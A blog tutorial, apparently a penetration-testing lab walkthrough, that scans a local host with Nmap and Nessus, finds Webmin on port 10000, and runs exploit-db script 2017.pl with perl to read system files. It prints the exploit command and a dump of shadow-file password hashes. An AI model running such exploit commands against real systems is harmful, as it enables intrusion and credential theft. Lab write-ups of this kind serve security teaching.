THE STEPS
- INFORMATION GATHERINGi'm looking Information Gathering by Nmap and I was get informatin about :
On the picture we can see information about :Service and Prot who is running in the host. - SERVICE ENUMERATIONnow we know service who is running in the host. Like thatPort 22 Service SSHPort 80 Service HTTPPort 139 Service netbios-ssn SambaPort 445 Service netbios-ssn SambaPort 10000/tcp Service HTTP
- VULNERABILITY IDENTIFICATIONFor VA, on this time I using NESSUS
because i'm looking for information about username and password is the web application,I took the initiative to see the vulnerability of the port 10000 and I get a vulnerability in there.then i try look at browser http://192.168.0.112 and show screen picture
After that i try open port by http://192.168.0.112:10000 and show screen picture
i'm sorry about this picture but a right picture is behind terminal. we can see form login who need user name and password.from information nessu i know, i must looking for webmin and looking for it by metasploit.dbroot@sinobi:/pentest/exploits/exploitdb#root@sinobi:/pentest/exploits/exploitdb# ./searchsploit webmin
after thatroot@sinobi:/pentest/exploits/exploitdb# cp platforms/multiple/remote/2017.pl
after we copy the file, now we can open the file for example use kwrite :
this is file from 2017.pl and this file by language perl program.after read about this file you must know about http = 0 and https = 1 . this informatin will using when we run command. like that :root@sinobi:/home#perl 2017.pl ip port /etc/password http/httpsroot@sinobi:/home#perl 2017.pl 192.168.0.112 10000 /etc/password 0
and result of the command are :
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::the information we get from /etc/shadowOk in the next lesson i will explain how to encryp password using JTR
Tidak ada komentar:
Posting Komentar